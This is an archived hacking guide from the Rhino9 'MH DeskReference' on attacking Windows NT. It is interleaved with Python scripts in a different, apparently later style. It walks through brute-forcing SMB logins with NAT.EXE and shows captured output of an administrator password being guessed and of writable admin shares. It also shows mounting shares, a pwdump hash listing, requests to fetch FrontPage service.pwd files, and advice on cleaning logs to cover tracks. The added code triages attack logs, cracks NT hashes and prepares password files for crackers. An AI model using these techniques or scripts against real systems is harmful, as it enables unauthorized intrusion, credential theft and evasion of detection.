Archive Date: 21-04-2001
Category: Information Technologies
Sub-Category: Microsoft

      Source: http://www.infosyssec.org/infosyssec/TheMHD.html

      The MH DeskReference
      Version 1.2
      Written/Assembled by
      The Rhino9 Team
      [8.0.0] NetBIOS Attack Methods
      This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98 beta 2.1. One of the components used is NAT.EXE (the NetBIOS Auditing Tool, built on Andrew Tridgell's Samba code). A discussion of the tool, its switches, and common techniques follows:
      NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
      Switches:
      -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
      -u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server.
      Usernames should appear one per line in the specified file.
      -p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server.
      Passwords should appear one per line in the specified file.
      <address>
      Addresses are specified in comma-delimited format with no spaces. Valid address specifications include:

      hostname - "hostname" is added
      127.0.0.1-127.0.0.3 - adds addresses 127.0.0.1 through 127.0.0.3
      127.0.0.1-3 - adds addresses 127.0.0.1 through 127.0.0.3
      127.0.0.1-3,7,10-20 - adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, and 127.0.0.10 through 127.0.0.20
      hostname,127.0.0.1-3 - adds "hostname" and 127.0.0.1 through 127.0.0.3
      All combinations of hostnames and address ranges as specified above are valid.

      [8.0.1] Comparing NAT.EXE to Microsoft's own executables
      [8.0.2] First, a look at NBTSTAT

      First we look at the NBTSTAT command. This command was discussed in an earlier portion of the book ([5.0.6] The Nbtstat Command). In this section you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non-Microsoft tools.
      What follows is pretty much a step-by-step guide to using NBTSTAT, plus extra information. Again, if you're interested in more NBTSTAT switches and functions, see the [5.0.6] The Nbtstat Command portion of the book.

       C:\>nbtstat -A XXX.XX.XXX.XX

           NetBIOS Remote Machine Name Table

         Name                Type         Status
       ---------------------------------------------
       STUDENT1        <20>  UNIQUE      Registered
       STUDENT1        <00>  UNIQUE      Registered
       DOMAIN1         <00>  GROUP       Registered
       DOMAIN1         <1C>  GROUP       Registered
       DOMAIN1         <1B>  UNIQUE      Registered
       STUDENT1        <03>  UNIQUE      Registered
       DOMAIN1         <1E>  GROUP       Registered
       DOMAIN1         <1D>  UNIQUE      Registered
       ..__MSBROWSE__. <01>  GROUP       Registered

       MAC Address = 00-C0-4F-C4-8C-9D
      Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name). The same suffix means different things for UNIQUE and GROUP names:
      Computername <00> UNIQUE  Workstation Service name
      Domainname   <00> GROUP   Domain (or workgroup) name
      Computername <20> UNIQUE  Server Service name (file and print sharing)
      Computername <03> UNIQUE  Registered by the Messenger Service. This is the computer name to add to the LMHOSTS file; that is not necessary to use NAT.EXE, but it is necessary if you want to see the remote computer in Network Neighborhood.
      Username     <03> UNIQUE  Registered by the Messenger Service for the logged-on user
      Domainname   <1B> UNIQUE  Domain Master Browser (registered by the PDC)
      Domainname   <1C> GROUP   Domain controllers for the domain (PDC or BDC)
      Domainname   <1D> UNIQUE  Master Browser for the local segment
      Domainname   <1E> GROUP   Browser Service Elections

      <BF> Network Monitor Application
      <BE> Network Monitor Agent
      <06> RAS Server
      <1F> NetDDE Service
      <21> RAS Client
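The name table above can be decoded mechanically. The following Python script is an added example, not part of the original MH DeskReference and not NAT.EXE or nbtstat code: it parses nbtstat -A output (the capture above is embedded as its sample input), decodes each suffix with the table just given, and summarizes what the host is (file server, domain controller, browser roles, logged-on users). The role names and the decision rules in summarize() are the editor's; nothing here touches the network.

```python
import re
from typing import Dict, List, Optional, Tuple

# NetBIOS name-suffix table (the 16th byte of a NetBIOS name). The same
# suffix means different things for UNIQUE and GROUP names, so both are keyed.
SUFFIXES: Dict[Tuple[str, str], str] = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain or workgroup name",
    ("01", "GROUP"): "Master Browser (__MSBROWSE__)",
    ("03", "UNIQUE"): "Messenger Service (computer or user name)",
    ("06", "UNIQUE"): "RAS Server",
    ("1B", "UNIQUE"): "Domain Master Browser (PDC)",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser (local segment)",
    ("1E", "GROUP"): "Browser Service Elections",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "Server Service (file/print sharing)",
    ("21", "UNIQUE"): "RAS Client",
    ("BE", "UNIQUE"): "Network Monitor Agent",
    ("BF", "UNIQUE"): "Network Monitor Application",
}

# One name-table row: "<name> <xx> UNIQUE|GROUP Registered"
ROW_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Sample input: the nbtstat -A output shown above, embedded so the script runs offline.
SAMPLE_NBTSTAT = """
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
"""


def parse_nbtstat(output: str) -> Tuple[List[dict], Optional[str]]:
    """Parse nbtstat -A output into name-table rows plus the MAC address."""
    rows, mac = [], None
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            suffix = suffix.upper()
            rows.append({"name": name, "suffix": suffix, "type": kind, "status": status,
                         "service": SUFFIXES.get((suffix, kind), "unknown suffix")})
            continue
        mm = MAC_RE.search(line)
        if mm:
            mac = mm.group(1).upper()
    return rows, mac


def summarize(rows: List[dict]) -> dict:
    """Turn the raw name table into the facts an attacker (or defender) cares about."""
    present = {(r["suffix"], r["type"]) for r in rows}
    computer = next((r["name"] for r in rows if (r["suffix"], r["type"]) == ("00", "UNIQUE")), None)
    domain = next((r["name"] for r in rows if (r["suffix"], r["type"]) == ("00", "GROUP")), None)
    # A <03> UNIQUE name that is not the computer name is a logged-on user (Messenger Service).
    users = sorted({r["name"] for r in rows
                    if (r["suffix"], r["type"]) == ("03", "UNIQUE") and r["name"] != computer})
    return {
        "computer": computer,
        "domain": domain,
        "file_server": ("20", "UNIQUE") in present,        # Server Service: shares to enumerate
        "domain_controller": ("1C", "GROUP") in present,   # PDC/BDC: the domain SAM lives here
        "domain_master_browser": ("1B", "UNIQUE") in present,
        "master_browser": ("1D", "UNIQUE") in present,
        "logged_on_users": users,
    }


if __name__ == "__main__":
    rows, mac = parse_nbtstat(SAMPLE_NBTSTAT)
    for r in rows:
        print(f"{r['name']:<18} <{r['suffix']}> {r['type']:<7} {r['service']}")
    print("MAC:", mac)
    print(summarize(rows))
```

Feed it the saved output of nbtstat -A and the summary tells you in one line whether the box is worth pointing NAT.EXE at (Server Service present) and whether a password guess there would land on a domain controller.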

      [8.0.3] Intro to the NET commands
      The NET command can be run from a command window by administrators to show information about servers, networks, shares, and connections. It also has a number of options you can use to add user accounts and groups, change domain settings, and configure shares. In this section you will learn about these NET commands, and you will also get the outline of a NET command batch file that can be used as a primitive network security analysis tool. Before we continue with the techniques, a discussion of the available options comes first:

      [8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
      [8.0.5] Net Computer: This adds or deletes computers from a domains database.
      [8.0.6] Net Config Server or Net Config Workstation: Displays configuration information for the Server or Workstation service. When used without specifying Server or Workstation, the command displays a list of configurable services.
      [8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
      [8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
      [8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
      [8.1.0] Net Help: Help with these commands
      [8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
      [8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
      [8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.
      [8.1.4] Net Pause: Use this command to suspend a certain NT service.
      [8.1.5] Net Print: Displays print jobs and shared queues.
      [8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
      [8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
      [8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
      [8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
      [8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Note that stopping one service may also stop the services that depend on it.
      [8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
      [8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
      [8.2.3] Net User: This command displays a list of user accounts for the computer, and has options for creating and modifying those accounts.
      [8.2.4] Net View: This command displays a list of resources being shared on a computer, including NetWare servers.
      [8.2.5] Special note on DOS and older Windows machines: the commands listed above are available on Windows NT Server and Workstation. DOS and older Windows clients have these NET commands available:
      • Net Config
      • Net Diag (runs the diagnostic program)
      • Net Help
      • Net Init (loads protocol and network adapter drivers.)
      • Net Logoff
      • Net Logon
      • Net Password (changes password)
      • Net Print
      • Net Start
      • Net Stop
      • Net Time
      • Net Use
      • Net Ver (displays the type and version of the network redirector)
      • Net View

      For this section, the commands used are NET VIEW and NET USE.
      [8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
      C:\>net view XXX.XX.XXX.XX
      Shared resources at XXX.XX.XXX.XX

      Share name   Type   Used as   Comment
      ------------------------------------------------------------------------------
      NETLOGON     Disk             Logon server share
      Test         Disk
      The command completed successfully.
      NOTE: The administrative shares C$, ADMIN$ and IPC$ are hidden (their names end in $) and are not listed by NET VIEW; NAT.EXE enumerates them anyway, as the capture below shows.
       
      C:\>net use /?
      The syntax of this command is:
      NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
              [/USER:[domainname\]username]
              [[/DELETE] | [/PERSISTENT:{YES | NO}]]
      NET USE [devicename | *] [password | *]] [/HOME]
      NET USE [/PERSISTENT:{YES | NO}]

      C:\>net use x: \\XXX.XX.XXX.XX\test
      The command completed successfully.

      C:\unzipped\nat10bin>net use
      New connections will be remembered.

      Status   Local   Remote                   Network
      -------------------------------------------------------------------------------
      OK       X:      \\XXX.XX.XXX.XX\test     Microsoft Windows Network
      OK               \\XXX.XX.XXX.XX\test     Microsoft Windows Network
      The command completed successfully.

      Here is an actual example of how NAT.EXE is used. What follows is a capture of the activity; the IP addresses have been changed to protect, well, us.

      C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
       
      [*]--- Reading usernames from userlist.txt
      [*]--- Reading passwords from passlist.txt
      [*]--- Checking host: XXX.XX.XXX.XX
      [*]--- Obtaining list of remote NetBIOS names
      [*]--- Attempting to connect with name: *
      [*]--- Unable to connect
      [*]--- Attempting to connect with name: *SMBSERVER
      [*]--- CONNECTED with name: *SMBSERVER
      [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
      [*]--- Server time is Mon Dec 01 07:44:34 1997
      [*]--- Timezone is UTC-6.0
      [*]--- Remote server wants us to encrypt, telling it not to
      [*]--- Attempting to connect with name: *SMBSERVER
      [*]--- CONNECTED with name: *SMBSERVER
      [*]--- Attempting to establish session
      [*]--- Was not able to establish session with no password
      [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
      [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
      [*]--- Obtained server information:
      Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
      [*]--- Obtained listing of shares:

      Sharename      Type     Comment
      ---------      ----     -------
      ADMIN$         Disk:    Remote Admin
      C$             Disk:    Default share
      IPC$           IPC:     Remote IPC
      NETLOGON       Disk:    Logon server share
      Test           Disk:
      [*]--- This machine has a browse list:

      Server         Comment
      ---------      -------
      STUDENT1
      [*]--- Attempting to access share: \\*SMBSERVER\
      [*]--- Unable to access
      [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
      [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
      [*]--- Checking write access in: \\*SMBSERVER\ADMIN$
      [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
      [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
      [*]--- Attempting to access share: \\*SMBSERVER\C$
      [*]--- WARNING: Able to access share: \\*SMBSERVER\C$
      [*]--- Checking write access in: \\*SMBSERVER\C$
      [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
      [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
      [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
      [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
      [*]--- Checking write access in: \\*SMBSERVER\NETLOGON
      [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
      [*]--- Attempting to access share: \\*SMBSERVER\Test
      [*]--- WARNING: Able to access share: \\*SMBSERVER\Test
      [*]--- Checking write access in: \\*SMBSERVER\Test
      [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
      [*]--- Attempting to access share: \\*SMBSERVER\D$
      [*]--- Unable to access
      [*]--- Attempting to access share: \\*SMBSERVER\ROOT
      [*]--- Unable to access
      [*]--- Attempting to access share: \\*SMBSERVER\WINNT$
      [*]--- Unable to access

      If the default share permissions (Everyone/Full Control) are still in place, you are done: the server is hacked. If not, keep playing. You will be surprised what you find out.
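NAT writes everything it tries to one flat log, so the lines that matter (the credentials that worked, which shares are readable and which are writable) are easy to lose among the attempts. This Python triage script is an added example by the editor, not part of the original text and not NAT.EXE code. It runs over an abridged copy of the capture above (embedded as constructed sample input) and pulls out the host, the working credentials, per-share access, and a severity-ranked list of findings. The severity labels, and the rule that a writable ADMIN$ or drive share means full control of the host, are the editor's judgement, not NAT output.

```python
import re

# Sample input: an abridged copy of the NAT.EXE capture above, with the same placeholders.
SAMPLE_NAT = r"""
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
"""

HOST_RE = re.compile(r"Checking host:\s*(\S+)")
CRED_RE = re.compile(r"CONNECTED: Username: `([^']*)' Password: `([^']*)'")
INFO_RE = re.compile(r"Server=\[([^\]]*)\].*Workgroup=\[([^\]]*)\]")
SHARE_RE = re.compile(r"Attempting to access share:\s*(\S+)")


def is_admin_share(name: str) -> bool:
    """ADMIN$ (the %SystemRoot%) or a drive share like C$ gives the whole filesystem."""
    return name == "ADMIN$" or re.fullmatch(r"[A-Za-z]\$", name) is not None


def triage_nat(log: str) -> dict:
    """Reduce a NAT log to host facts, working credentials, per-share access and findings."""
    report = {"host": None, "server": None, "workgroup": None,
              "credentials": [], "shares": {}, "findings": []}
    current = None  # share named by the most recent "Attempting to access share" line
    for raw in log.splitlines():
        line = raw.strip()
        if (m := HOST_RE.search(line)):
            report["host"] = m.group(1)
        elif (m := CRED_RE.search(line)):
            report["credentials"].append((m.group(1), m.group(2)))
        elif (m := INFO_RE.search(line)):
            report["server"], report["workgroup"] = m.group(1), m.group(2)
        elif (m := SHARE_RE.search(line)):
            # \\*SMBSERVER\ADMIN$ -> ADMIN$ ; the bare \\*SMBSERVER\ probe has no name
            current = m.group(1).rsplit("\\", 1)[-1] or None
            if current:
                report["shares"].setdefault(current, {"readable": False, "writable": False})
        elif current and "WARNING: Able to access share" in line:
            report["shares"][current]["readable"] = True
        elif current and "WARNING: Directory is writeable" in line:
            report["shares"][current]["writable"] = True

    for user, password in report["credentials"]:
        report["findings"].append(f"CRITICAL: guessed credentials {user}/{password}")
    for name, access in report["shares"].items():
        if access["writable"] and is_admin_share(name):
            report["findings"].append(
                f"CRITICAL: administrative share {name} is writable (full control of the host)")
        elif access["writable"]:
            report["findings"].append(f"HIGH: share {name} is writable")
        elif access["readable"]:
            report["findings"].append(f"MEDIUM: share {name} is readable")
    return report


if __name__ == "__main__":
    result = triage_nat(SAMPLE_NAT)
    print(f"{result['host']} ({result['server']} in {result['workgroup']})")
    for finding in result["findings"]:
        print(" ", finding)
```

Point it at the -o output file of a real run (one host per "Checking host" block) and the findings list is the part you would actually put in a report.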

      [9.0.0] Frontpage Extension Attacks
      Of course, everyone should know what Microsoft FrontPage is. The server extensions are installed server-side to provide added functionality for FrontPage web authors. These extensions function as "web bots", if you will, giving web authors who use FrontPage easy access to complex web and HTML functions. Soon after the extensions came into wide use, security concerns began to pop up. Most of these concerns were very basic; the collection presented below consists of PROVEN methods that have been tested repeatedly in several types of configurations.

      [9.0.1] For the tech geeks, we give you an actual PWDUMP
      This is the pwdump output from the web server; the Administrator's LAN Manager password is "password". This PWDUMP example is for those of you who have heard about the utility but have never actually seen its output. This dump was used by Vacuum of rhino9 during his work on cracking NT's password hashes.

      Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
      Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
      STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
      ketan:1005:********************************:********************************:::
      mari:1006:********************************:********************************:::
      meng:1007:********************************:********************************:::
      IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
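A pwdump line is user:RID:LM hash:NT hash:comment:home directory:, and the NT hash is nothing more than MD4 over the UTF-16LE encoding of the password, with no salt. The following Python script is an added example (the editor's code, not Vacuum's or rhino9's tooling and not from the original text): it parses the dump above (embedded as sample input), computes NT hashes with a pure-Python MD4 so it does not depend on hashlib having md4 enabled, recovers the Administrator password from a small candidate list, and reports which accounts still carry an LM hash. The candidate list is constructed for the example.

```python
import struct
from typing import Dict, List, Optional

# Sample input: the pwdump output shown above, embedded so this runs offline.
SAMPLE_PWDUMP = """\
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
"""


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is missing on many OpenSSL 3 builds,
    so the primitive is spelled out here; it is the whole of the NT hash."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & mask & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    # Pad to 56 mod 64, then append the bit length little-endian.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                t = (a + fn(b, c, d) + x[j] + k) & mask
                s = shifts[i % 4]
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & mask, b, c
        state = [(v + w) & mask for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so one computation serves every account."""
    return md4(password.encode("utf-16-le")).hex()


def _hex32(field: str) -> Optional[str]:
    """A real hash is 32 hex digits; 'NO PASSWORD***' and '****' placeholders become None."""
    field = field.strip()
    try:
        int(field, 16)
    except ValueError:
        return None
    return field.lower() if len(field) == 32 else None


def parse_pwdump(text: str) -> List[dict]:
    """user:rid:LM hash:NT hash:comment:home: -> one dict per account."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": _hex32(parts[2]), "nt": _hex32(parts[3])})
    return entries


def crack_nt(entries: List[dict], candidates: List[str]) -> Dict[str, str]:
    """Offline check of each NT hash against a candidate list (a wordlist in practice)."""
    table = {nt_hash(p): p for p in candidates}
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


def lm_enabled(entries: List[dict]) -> List[str]:
    """Accounts that still store a LAN Manager hash (the weak, case-folded 14-char form)."""
    return [e["user"] for e in entries if e["lm"]]


if __name__ == "__main__":
    accounts = parse_pwdump(SAMPLE_PWDUMP)
    print("cracked:", crack_nt(accounts, ["apple", "password", "letmein"]))  # constructed list
    print("LM hash present:", lm_enabled(accounts))
```

The LM hash in the first column is the weaker of the two (DES over two 7-byte halves of the upper-cased password), which is why the text calls "password" the LAN Manager password: any account that still has a value there can be attacked half a password at a time.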
      [9.0.2] The #haccess.ctl file
      The #haccess.ctl file is sometimes called a shadow password file; that is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the #haccess.ctl file is given below:
      The #haccess.ctl file:
      # -FrontPage-
      Options None
      <Limit GET POST PUT>
      order deny,allow
      deny from all
      </Limit>
      AuthName default_realm
      AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
      AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

      Running fpservwin.exe installs the FrontPage Server Extensions for port 80 (HTTP) or port 443 (HTTPS, Secure Sockets Layer).
      NOTE the Limit line: telnetting to port 80 or 443 and issuing GET, POST and PUT requests by hand can be used instead of the FrontPage client.
      The following is a list of Internet Information Server file locations on the local hard drive (C:) and their paths on the web (www.target.com):

      C:\InetPub\wwwroot                          <Home>
      C:\InetPub\scripts                          /Scripts
      C:\InetPub\wwwroot\_vti_bin                 /_vti_bin
      C:\InetPub\wwwroot\_vti_bin\_vti_adm        /_vti_bin/_vti_adm
      C:\InetPub\wwwroot\_vti_bin\_vti_aut        /_vti_bin/_vti_aut
      C:\InetPub\cgi-bin                          /cgi-bin
      C:\InetPub\wwwroot\srchadm                  /srchadm
      C:\WINNT\System32\inetserv\iisadmin         /iisadmin
      C:\InetPub\wwwroot\_vti_pvt                 /_vti_pvt

      FrontPage creates a _vti_pvt directory for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains the two files that the access file points to:

      service.pwd contains the list of users and passwords for the FrontPage web.
      service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
      On Netscape servers, there are no service.grp files. The Netscape password files are:
      administrators.pwd for administrators
      authors.pwd for authors and administrators
      users.pwd for users, authors, and administrators
      C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM            Index Server sample query page
      If Index Server is running under Internet Information Server, service.pwd (or any other indexed file) can sometimes be retrieved through it: search for
      "#filename=*.pwd"
      C:\Program Files\Microsoft FrontPage\_vti_bin
      C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
      C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
      C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm     /iisadmin/isadmin
      C:\InetPub\ftproot                                          The default location for the FTP root

      The FTP service by default runs on the standard port 21.
      Check whether anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT; anonymous users do not log on with that user name and password.

      Typically, anonymous FTP users give "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server's Setup created the account IUSR_computername both in the Windows NT User Manager for Domains and in Internet Service Manager, and assigned it a random password in both places. If you change the password, you must change it in both places and make sure they match.

      NOTE: Name and password are case sensitive.
      Scanning port 80 (http) or 443 (https), the requests to try:

      GET /_vti_inf.html               # Confirms that the FrontPage Server Extensions are installed.
      GET /_vti_pvt/service.pwd        # Contains the encrypted passwords. Not used on IIS and WebSite servers.
      GET /_vti_pvt/authors.pwd        # Netscape servers only. Encrypted names and passwords of authors.
      GET /_vti_pvt/administrators.pwd
      GET /_vti_log/author.log         # If author.log is there it will need to be cleaned to cover your tracks.
      GET /samples/search/queryhit.htm

      If service.pwd is obtained it will look similar to this:

      Vacuum:SGXJVl6OJ9zkE
      The password above is apple; the hash is a traditional Unix DES crypt(3) hash (2-character salt "SG" followed by 11 characters).
      Turn it into a passwd-style line so a Unix cracker will accept it:
      Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
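Since #haccess.ctl is an Apache-style directive file and service.pwd is simply user:crypt(3)-hash, both can be handled by a few lines of Python. The script below is an added example by the editor, not FrontPage's own code and not from the original text: it parses the #haccess.ctl shown above, maps AuthUserFile onto the /_vti_pvt/ URL the GET list above uses, and rewrites service.pwd entries into the passwd-style lines just described. Both inputs are embedded as sample data constructed from the listings above; the uid, gid, home and shell filler values are the ones the text chose, and a cracker ignores them anyway.

```python
import re
from typing import List, Optional

# Sample inputs, constructed from the #haccess.ctl and service.pwd shown above.
SAMPLE_HACCESS = r"""# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
"""

SAMPLE_SERVICE_PWD = """# -FrontPage-
Vacuum:SGXJVl6OJ9zkE
"""

# Traditional crypt(3): 2-char salt + 11 chars, all from [./0-9A-Za-z].
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def parse_haccess(text: str) -> dict:
    """Read the Apache-style directives FrontPage writes into #haccess.ctl."""
    cfg = {"limit_methods": [], "directives": {}}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("</"):
            continue
        m = re.match(r"<Limit\s+([^>]+)>", line, re.IGNORECASE)
        if m:
            cfg["limit_methods"] = m.group(1).split()
            continue
        key, _, value = line.partition(" ")
        cfg["directives"][key] = value.strip()
    return cfg


def unescape_path(path: str) -> str:
    """'c:/frontpage\\ webs/...' -> 'c:/frontpage webs/...' (backslash escapes the space)."""
    return path.replace("\\ ", " ")


def web_path(local_path: str) -> Optional[str]:
    """Map an AuthUserFile/AuthGroupFile path onto the URL the file is served from:
    everything from /_vti_pvt/ onward is relative to the web root."""
    p = unescape_path(local_path).replace("\\", "/")
    i = p.find("/_vti_pvt/")
    return p[i:] if i >= 0 else None


def service_pwd_to_passwd(text: str, uid_start: int = 10, gid: int = 200,
                          home_base: str = "/users", shell: str = "/bin/bash") -> List[str]:
    """Rewrite service.pwd entries as passwd(5) lines for a Unix DES-crypt cracker.
    Entries whose hash is not a crypt(3) string are skipped rather than fed to the cracker."""
    out, uid = [], uid_start
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, hashed = line.partition(":")
        if not DES_CRYPT_RE.match(hashed):
            continue
        out.append(f"{user}:{hashed}:{uid}:{gid}:{user}:{home_base}/{user}:{shell}")
        uid += 1
    return out


if __name__ == "__main__":
    cfg = parse_haccess(SAMPLE_HACCESS)
    print("methods limited:", cfg["limit_methods"])
    for key in ("AuthUserFile", "AuthGroupFile"):
        print(key, "->", web_path(cfg["directives"][key]))
    for line in service_pwd_to_passwd(SAMPLE_SERVICE_PWD):
        print(line)
```

The Limit block is worth reading as well as the Auth lines: it names the methods the extensions protect, which is the same list (GET, POST, PUT) the text suggests issuing by hand.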

